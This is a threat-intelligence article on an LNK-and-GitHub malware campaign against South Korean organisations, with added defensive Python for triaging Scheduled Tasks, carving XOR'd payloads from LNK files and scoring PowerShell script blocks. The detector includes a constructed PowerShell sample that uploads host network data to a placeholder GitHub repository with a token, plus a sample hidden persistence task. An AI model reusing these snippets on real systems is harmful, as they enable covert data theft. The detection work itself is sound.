Hackers are abusing Windows shortcut files and GitHub to run a stealthy, multi‑stage malware campaign against organizations in South Korea.
The operation chains LNK files, PowerShell, and the GitHub API to deliver surveillance tools while blending into normal enterprise traffic.

The campaign begins with weaponized LNK files that carry hidden scripts rather than acting as simple shortcuts. Earlier waves, observed since 2024, used basic string concatenation to obscure a GitHub C2 URL and an access token, according to FortiGuard Labs.
Those older samples also exposed rich metadata, including recurring file names, sizes, and “Hangul Document” labels, a pattern often linked with North Korea‑aligned groups such as Kimsuky, APT37, and Lazarus.
Over time, the operators upgraded their tooling, adding simple decoding functions and embedding encoded payloads directly in the LNK arguments.
When a victim opens the lure, a legitimate‑looking PDF themed around Korean business appears, while the PowerShell code executes silently in the background.
GitHub-Backed Malware
The decoded PowerShell script first checks whether it is running in an analysis environment by scanning the process list for virtualization, debugging, and forensic tools, including VMware, VirtualBox, IDA, dnSpy, Wireshark, Fiddler, x64dbg, and Process Hacker.
If any of these are found, the script exits immediately, so analysts running such tools never see the later stages. When no analysis tools are detected, the script reconstructs Base64‑encoded strings and writes a VBScript payload into a randomly named folder under %Temp%.
To survive reboots, the malware registers a hidden Scheduled Task that runs the VBScript every 30 minutes through wscript.exe, under a long, document‑like task name chosen to blend in with legitimate entries.
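The persistence pattern above is unusually specific and easy to hunt for: a script host launched from a Temp folder, a 30‑minute repetition, the hidden flag, and an over‑long task name. The following is an added triage example (not from the FortiGuard report) that scores a task definition on those four points. It takes the task XML as it appears in the TaskContent field of Security event 4698 or in the files under C:\Windows\System32\Tasks; the two sample definitions are constructed for this example, cscript.exe is added alongside wscript.exe as a generalization, and the 40‑character name cut‑off is an assumption, since the report only says “long”.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

# wscript.exe is what the report names; cscript.exe is added here as a generalisation.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
TEMP_PATH = re.compile(r"%temp%|\\temp\\|\\appdata\\local\\temp", re.IGNORECASE)
# The report says "long, document-like" but gives no length, so 40 characters is an assumed cut-off.
LONG_NAME = 40
DOC_EXT = re.compile(r"\.(docx?|xlsx?|pptx?|pdf|hwpx?)\b", re.IGNORECASE)


def _local(tag: str) -> str:
    """Strip the task-schema namespace from an element tag."""
    return tag.rsplit("}", 1)[-1]


def _texts(root: ET.Element, name: str) -> List[str]:
    """All non-empty text values of elements with the given local name."""
    return [e.text.strip() for e in root.iter()
            if isinstance(e.tag, str) and _local(e.tag) == name and e.text and e.text.strip()]


def _duration_minutes(iso: str) -> Optional[float]:
    """Convert an ISO 8601 duration such as PT30M or P1D to minutes."""
    m = re.fullmatch(r"P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?", iso)
    if not m:
        return None
    d, h, mi, s = (int(x) if x else 0 for x in m.groups())
    return d * 1440 + h * 60 + mi + s / 60


def triage_task(task_name: str, task_xml: str) -> List[str]:
    """Return the indicators a task definition matches; an empty list means nothing stood out."""
    root = ET.fromstring(task_xml)
    hits: List[str] = []
    commands = _texts(root, "Command")
    for cmd in commands:
        if cmd.strip('"').lower().rsplit("\\", 1)[-1] in SCRIPT_HOSTS:
            hits.append(f"script-host:{cmd}")
    if any(TEMP_PATH.search(s) for s in commands + _texts(root, "Arguments")):
        hits.append("temp-path")
    for interval in _texts(root, "Interval"):          # <Repetition><Interval> on the trigger
        minutes = _duration_minutes(interval)
        if minutes is not None and minutes <= 30:
            hits.append(f"repeat-every:{interval}")
    if any(v.lower() == "true" for v in _texts(root, "Hidden")):
        hits.append("hidden")
    if len(task_name) >= LONG_NAME or DOC_EXT.search(task_name):
        hits.append("document-like-name")
    return hits


# Constructed sample definitions (not taken from the campaign).
SUSPICIOUS_NAME = "Microsoft Office Document Cache Sync - 2025 Business Plan Review.hwp"
SUSPICIOUS_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <TimeTrigger>
      <Repetition><Interval>PT30M</Interval><StopAtDurationEnd>false</StopAtDurationEnd></Repetition>
      <StartBoundary>2025-01-01T09:00:00</StartBoundary>
      <Enabled>true</Enabled>
    </TimeTrigger>
  </Triggers>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\wscript.exe</Command>
      <Arguments>//B //E:VBScript "C:\Users\user\AppData\Local\Temp\k3x9q\sync.vbs"</Arguments>
    </Exec>
  </Actions>
</Task>"""

BENIGN_NAME = "Vendor Updater Daily"
BENIGN_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2025-01-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Actions Context="Author">
    <Exec><Command>"C:\Program Files\Vendor\Updater.exe"</Command><Arguments>/silent</Arguments></Exec>
  </Actions>
</Task>"""


if __name__ == "__main__":
    for name, task_xml in ((SUSPICIOUS_NAME, SUSPICIOUS_XML), (BENIGN_NAME, BENIGN_XML)):
        print(f"{name!r}: {triage_task(name, task_xml) or 'clean'}")
```

Any single indicator is common in legitimate environments (plenty of vendor tasks are hidden, and plenty run every half hour); the combination of a script host, a Temp path and a short repetition is what should page someone.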
On the LNK side, the newest variants strip nearly all identifying metadata and keep only a small decoder, p1, which takes a file path, a length, and an XOR key and unpacks both the decoy PDF and the next‑stage PowerShell script.
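For an analyst the decoder’s signature (path, length, key) is all that is needed to carve the payloads out of a sample offline. The code below is an added re‑implementation of that step, not the campaign’s decoder: it assumes the two payloads are appended after the shortcut structures and that the key is a short repeating byte string. The LNK header check uses the fixed HeaderSize/LinkCLSID prefix every shortcut starts with; the sample file, key and payload contents are constructed for the example.

```python
from pathlib import Path
from typing import Tuple

# Fixed start of every ShellLinkHeader: HeaderSize 0x4C, then LinkCLSID 00021401-0000-0000-C000-000000000046.
LNK_MAGIC = bytes.fromhex("4c000000011402000000000000c000000000000046")
HEADER_SIZE = 0x4C


def is_lnk(blob: bytes) -> bool:
    return blob.startswith(LNK_MAGIC)


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encodes and decodes."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def carve(blob: bytes, offset: int, length: int, key: bytes) -> bytes:
    """Take one span of the file and XOR-decode it (the shape of the p1 decoder's arguments)."""
    chunk = blob[offset:offset + length]
    if offset < 0 or len(chunk) != length:
        raise ValueError(f"file too short for span {offset}+{length}")
    return xor_bytes(chunk, key)


def unpack_lnk_bytes(blob: bytes, pdf_len: int, script_len: int, key: bytes) -> Tuple[bytes, bytes]:
    """Recover (decoy_pdf, next_stage_script), assuming the layout [shortcut data][XOR'd PDF][XOR'd script]."""
    if not is_lnk(blob):
        raise ValueError("not a Windows shortcut file")
    script_off = len(blob) - script_len
    pdf_off = script_off - pdf_len
    if pdf_off < HEADER_SIZE:
        raise ValueError("payload lengths overlap the shortcut header")
    pdf = carve(blob, pdf_off, pdf_len, key)
    script = carve(blob, script_off, script_len, key)
    if not pdf.startswith(b"%PDF-"):                  # cheap sanity check on key and lengths
        raise ValueError("decoded decoy is not a PDF: wrong key or lengths?")
    return pdf, script


def unpack_lnk(path: Path, pdf_len: int, script_len: int, key: bytes) -> Tuple[bytes, bytes]:
    return unpack_lnk_bytes(path.read_bytes(), pdf_len, script_len, key)


# Constructed sample: a header-only shortcut with two XOR'd payloads appended (assumed layout).
SAMPLE_KEY = b"\x5a\xa3"
SAMPLE_PDF = b"%PDF-1.4\n% constructed decoy document\n%%EOF\n"
SAMPLE_SCRIPT = b"# constructed stage-2 stub\nWrite-Output 'stage 2'\n"


def build_sample_lnk(key: bytes = SAMPLE_KEY) -> bytes:
    header = LNK_MAGIC + bytes(HEADER_SIZE - len(LNK_MAGIC))   # zero-fill the rest of the 76-byte header
    shortcut_data = bytes(200)                                 # stand-in for the link target structures
    return header + shortcut_data + xor_bytes(SAMPLE_PDF, key) + xor_bytes(SAMPLE_SCRIPT, key)


if __name__ == "__main__":
    blob = build_sample_lnk()
    pdf, script = unpack_lnk_bytes(blob, len(SAMPLE_PDF), len(SAMPLE_SCRIPT), SAMPLE_KEY)
    print(pdf[:8], script.decode())
```

In practice the lengths and key are read straight out of the LNK’s command‑line arguments (they are hard‑coded there, which is exactly why the newest variants could drop the rest of the metadata), and the `%PDF-` check is what tells you whether you copied them correctly.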

Once scheduled, the VBScript re‑launches the PowerShell payload in a hidden window, keeping execution going with minimal visibility to the user.
The script also collects detailed host data (OS version, build, last boot time, and process list), writes it to files named <timestamp>-<IP>-BEGIN.log, and uploads them to a GitHub repository through the API using a hardcoded access token.
Researchers traced these uploads to a GitHub user “motoralis,” whose private repositories and contribution history line up with spikes in LNK‑based phishing activity observed since 2025.
Additional usernames, including God0808RAMA, Pigresy80, entire73, pandora0009, and brandonleeodd93-blip, appear to form a wider infrastructure mix of dormant and newly created accounts.

While some accounts stay quiet for months, others activate briefly to provide backup channels, making the C2 layer resilient against takedowns.
Because all payloads and logs are stored in private GitHub repositories, defenders cannot inspect them directly, yet the traffic still looks like normal encrypted GitHub activity that corporate networks commonly allow.
This mirrors a broader trend of threat actors hijacking trusted public platforms, from developer services to file‑sharing tools, to host malware and exfiltrate data while evading URL‑ and domain‑based blocking.
Final stage: continuous GitHub control
In the third stage, a simpler PowerShell component focuses on keeping a live connection with the GitHub‑hosted C2.
It regularly pulls commands or additional modules from a raw GitHub file path under the motoralis repository, using the Scheduled Task created earlier as its heartbeat.
A dedicated “keep‑alive” script also gathers live network configuration data and pushes it back to GitHub with HTTP PUT, saving logs under paths formatted as <Date>_<Time>-<IP>-Real.log.
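Because the uploads ride inside TLS to api.github.com, the network rarely shows the path or the log name; the PowerShell that builds the request does, once script block logging (event 4104 in Microsoft-Windows-PowerShell/Operational) captures the decoded text. The following added detection example (not from the report) scores a script block on the traits described in this section and the BEGIN.log stage above: a write to the repository contents API with PUT, a pull from a raw GitHub path, a -BEGIN.log or -Real.log file name, and a GitHub token literal. The token prefixes ghp_ and github_pat_ are the real classic and fine‑grained PAT formats, but the report does not say which kind the campaign used, so both are checked; the two script blocks and the owner/repo names are constructed for the example.

```python
import re
from typing import Dict

CONTENTS_API = re.compile(r"https?://api\.github\.com/repos/([\w.-]+)/([\w.-]+)/contents/", re.I)
RAW_PULL = re.compile(r"https?://raw\.githubusercontent\.com/[\w.-]+/[\w.-]+/", re.I)
HTTP_PUT = re.compile(r"""-Method\s+['"]?Put\b""", re.I)
# Log-name suffixes from the report (<timestamp>-<IP>-BEGIN.log, <Date>_<Time>-<IP>-Real.log);
# matching the suffix catches both the literal name and the "$ts-$ip-Real.log" template form.
LOG_SUFFIX = re.compile(r"-(?:BEGIN|Real)\.log\b", re.I)
# GitHub classic PATs begin with ghp_, fine-grained ones with github_pat_; the report does not
# say which kind the campaign used, so both are checked.
TOKEN_LITERAL = re.compile(r"\b(?:ghp_[A-Za-z0-9]{30,}|github_pat_[A-Za-z0-9_]{30,})\b")


def score_script_block(text: str) -> Dict[str, str]:
    """Return the GitHub-C2 indicators found in one decoded script block."""
    hits: Dict[str, str] = {}
    api = CONTENTS_API.search(text)
    if api:
        hits["contents-api"] = f"{api.group(1)}/{api.group(2)}"
        if HTTP_PUT.search(text):
            hits["upload"] = "PUT"
    raw = RAW_PULL.search(text)
    if raw:
        hits["raw-pull"] = raw.group(0)
    log = LOG_SUFFIX.search(text)
    if log:
        hits["log-name"] = log.group(0)
    tok = TOKEN_LITERAL.search(text)
    if tok:
        hits["hardcoded-token"] = tok.group(0)[:8] + "..."   # record the prefix only, never the secret
    return hits


def verdict(hits: Dict[str, str]) -> str:
    """One GitHub API call is ordinary developer activity; the combination is what matters."""
    if "hardcoded-token" in hits and ("upload" in hits or "raw-pull" in hits):
        return "high"
    if len(hits) >= 2:
        return "medium"
    return "low" if hits else "none"


# Constructed script blocks (not taken from the campaign); the token below is a placeholder.
MALICIOUS_BLOCK = r'''
$ip = (Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -ne WellKnown | Select-Object -First 1).IPAddress
$name = "{0}-{1}-Real.log" -f (Get-Date -Format "yyyyMMdd_HHmmss"), $ip
$data = ipconfig /all | Out-String
$body = @{ message = "log"; content = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($data)) } | ConvertTo-Json
Invoke-RestMethod -Method Put -Uri "https://api.github.com/repos/exampleowner/examplerepo/contents/$name" `
    -Headers @{ Authorization = "token ghp_AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" } -Body $body
'''

BENIGN_BLOCK = r'''
$rel = Invoke-RestMethod -Uri "https://api.github.com/repos/exampleorg/tooling/releases/latest" `
    -Headers @{ Authorization = "Bearer $env:GITHUB_TOKEN" }
Write-Output $rel.tag_name
'''


if __name__ == "__main__":
    for label, block in (("suspicious", MALICIOUS_BLOCK), ("developer", BENIGN_BLOCK)):
        hits = score_script_block(block)
        print(label, verdict(hits), hits)
```

The benign block deliberately uses the GitHub API too, with a token read from the environment, and scores nothing: a token literal next to a contents‑API PUT or a raw pull is the signal, not GitHub itself. Early waves hid the token behind string concatenation, so a literal match alone will miss those; the log‑name and PUT patterns still fire on the reassembled script text that 4104 records.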

By chaining LNK shortcuts, native Windows scripting (PowerShell and VBScript), Scheduled Tasks, and GitHub APIs, the attackers avoid traditional executable droppers and reduce their on‑disk footprint.
Security teams are advised to treat unexpected LNK and document files with caution, tighten monitoring around PowerShell and wscript.exe activity and Scheduled Task creation, and baseline GitHub API usage so that unusual calls or access patterns stand out.